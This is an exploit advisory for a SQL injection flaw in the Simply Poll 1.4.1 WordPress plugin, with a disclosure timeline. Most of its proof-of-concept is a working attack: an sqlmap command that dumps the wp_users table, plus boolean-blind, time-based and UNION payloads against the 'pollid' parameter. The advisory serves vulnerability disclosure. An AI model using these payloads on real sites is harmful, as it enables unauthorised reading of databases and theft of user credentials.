# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress SQL Injection# Date: 21/12/2016# Exploit Author: TAD GROUP# Vendor Homepage: https://wordpress.org/plugins/simply-poll/# Software Link: https://wordpress.org/plugins/simply-poll/# Contact: info[at]tad.group# Website: https://tad.group# Category: Web Application Exploits1- Description
An unescaped parameter was found in Simply Poll version 1.4.1.( WP
plugin ). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid'is vulnerable.2. Proof of Concept
sqlmap -u "http://example.com/wp-admin/admin-ajax.php"--data="action=spAjaxResults&pollid=2"--dump -T wp_users -D wordpress
--threads=10--random-agent --dbms=mysql --level=5--risk=3
Parameter: pollid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=spAjaxResults&pollid=2 AND 6034=6034
Type: AND/OR time-based blind
Title: MySQL >=5.0.12 AND time-based blind
Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL)-7 columns
Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657
9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL--
CfNO
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.4 Impact:
Critical
5. Affected versions:<=1.4.16. Disclosure Timeline:21-Dec-2016 found the vulnerability
21-Dec-2016 informed the developer
28-Dec-2016 release date of this security advisory
Not fixed at the date of submitting that exploit.
